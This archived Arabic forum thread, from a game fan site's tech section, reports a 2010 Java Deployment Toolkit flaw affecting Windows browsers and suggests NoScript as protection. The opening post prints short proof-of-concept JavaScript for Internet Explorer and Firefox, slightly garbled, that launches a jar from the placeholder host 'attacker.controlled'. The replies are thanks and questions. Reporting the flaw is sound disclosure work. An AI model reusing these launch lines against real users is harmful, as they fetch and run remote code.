الموقع العربي الاول للعبة Silkroad Online

الموقع العربي الاول للعبة Silkroad Online (https://silkroad4arab.com/vb/index.php)
-   اخـبـار الـتـقـنـيـة و الـتـكـنـولـوجـيـا (https://silkroad4arab.com/vb/forumdisplay.php?f=154)
-   -   ثغرة خطيرة في java تهدد مستخدمي ويندوز (https://silkroad4arab.com/vb/showthread.php?t=228861)

NeT^DeV!L 16-05-2010 02:59 PM

ثغرة خطيرة في java تهدد مستخدمي ويندوز
 
بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاتة

http://www.isecur1ty.org/images/stories/java.png

اكتشف أحد مهندسي Google ثغرة خطيرة في JAVA موجودة في جميع الاصدارات التي تم اطلاقها بعد Java 6 Update 10. بحسب مكتشف الثغرة Tavis Ormandy والذي قام بنشر تفاصيلها بشكل علني مستخدمي ويندوز بجميع اصداراته معرضين للاختراق عن طريق المتصفّح بغض النظر عن نوعه طالما جافا منصّبة بالجهاز.




تعتبر هذه الثغرة شديدة الخطورة لأنها تعرض جميع اصدارات نظام ويندوز للاختراق عن طريق المتصفّح بكل سهولة وذلك عن طريق توجيه المستخدم لرابط يحتوي على كود يستغل خطأ في Java Deployment Toolkit التي تم اضافتها الى JAVA 6 Update 10 مما يسمح له بتمرير ملف .jar الى Java Web Start (وهي تقنيّة تسمح للمطورين بتشغيل برامجهم المبرمجة بلغة جافا من الانترنت عن طريق بروتوكول JNLP) وتشغيله على جهاز المستخدم.

استغلال هذه الثغرة لا يتعلّق بالمتصفّح حيث يمكن استغلالها على Internet Explorer و Firefox أيضاً في نظام ويندوز. أما أنظمة لينوكس وماك فعلى الأغلب أنها غير مصابة بهذه الثغرة.



كود الاستغلال في متصفّح Internet Explorer سيكون بالشكل:

كود PHP:

var document.createElement("OBJECT");

o.classid "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";

o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none"); 

أما متصفّح Mozilla Firefox فالكود هو نفسه تقريباً:

كود PHP:

var document.createElement("OBJECT");

o.type "application/npruntime-scriptable-plugin;deploymenttoolkit"

document.body.appendChild(o);

o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none"); 

التي بدورها ستقوم بتشغيله على النظام. مكتشف الثغرة كتب أنه أبلغ Sun قبل نشرها بشكل علني لكن رد الشركة أتى أن هذه الثغرة ليست خطيرة بما فيه الكفاية ليقوموا بكسر دورة التحديث الخاصة بجافا.

شخصيّاً أجد الثغرة خطيرة جداً لأن Java تعتبر من الأمور الأساسية وموجودة في أغلب الأنظمة والسبب الآخر هو طبيعة هذه الثغرة والثبات الكبير الذي عرفت به جافا! مع اضافة تقنيات جديدة من الطبيعي أن تكتشف ثغرات جديدة ومن مدة بسيطة شركة Oracle أطلقت تحديث لجافا لاصلاح 27 مشاكل أمنية فيها. كما أن هذه الثغرة لا تستغل خطأ في الذاكرة مثلاً أو تحقن شيل كود وبهذه الحالة لا يوجد مشاكل مع تقنيات الحماية مثل ASLR أو DEP لأن الاستغلال مختلف تماماً عن باقي ثغرات المتصفح المعروفة وملف .jar سيعمل على النظام دون أي مشاكل.

مكتشف الثغرة وضع بعض الحلول للحماية منها يمكنكم الاطلاع عليها من الرابط الموجود بالأسفل, شخصيّاً أرى أن الحل الأفضل (والأسهل) هو استخدام Firefox مع اضافة NoScript وبهذه الحالة ستكون قادر على التحكم بشكل كامل بالأمور والسكريبتات التي سيتم تشغيلها على متصفّحك وهذا كفيل لحمايتك من أغلب ثغرات المتصفح وليس هذه الثغرة فقط.

المصـــدر

amr174747 19-05-2010 03:01 PM

يا رب دايما في القمة

goda30 23-05-2010 09:31 PM

مشكور على النصيحة

DarK_AnGeL 25-05-2010 10:49 PM

الناس بتكبر وتخيب :d

_Zemos_ 31-05-2010 10:48 PM

شكرا للتنبيه

Xx_Naruto_xX 17-06-2010 10:55 PM

شكرا للتنبية

Jiraya Sama 23-06-2010 05:42 PM

يعنى احنا معرضين للاختراق فى اى وقت o.o

hill_dorgon 03-07-2010 01:13 PM

:spidy::spidy: اى ده بس انتا عرفت منين

QeRa 29-07-2010 04:39 AM

مشكور

iMido 06-08-2010 03:02 PM

طب ايه الحل

blacksea2010 07-08-2010 01:09 AM

tyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy

BonBony 09-08-2010 04:45 AM

طــب كدة ممكــن يختــرق الــ Cokies و يســرق ال Data ؟

7amomagzara 30-08-2010 06:15 PM

مشكور

WadCool 01-09-2010 10:59 AM

شكرا علي المعلومة ومجهود رائع منك فعلا :)

Maher901 01-09-2010 11:07 AM

:111 (16): ك،ـــدآآ !


الساعة الآن 11:23 AM.

Powered by vBulletin® Version 3.8.11
Copyright ©2000 - 2025, vBulletin Solutions, Inc.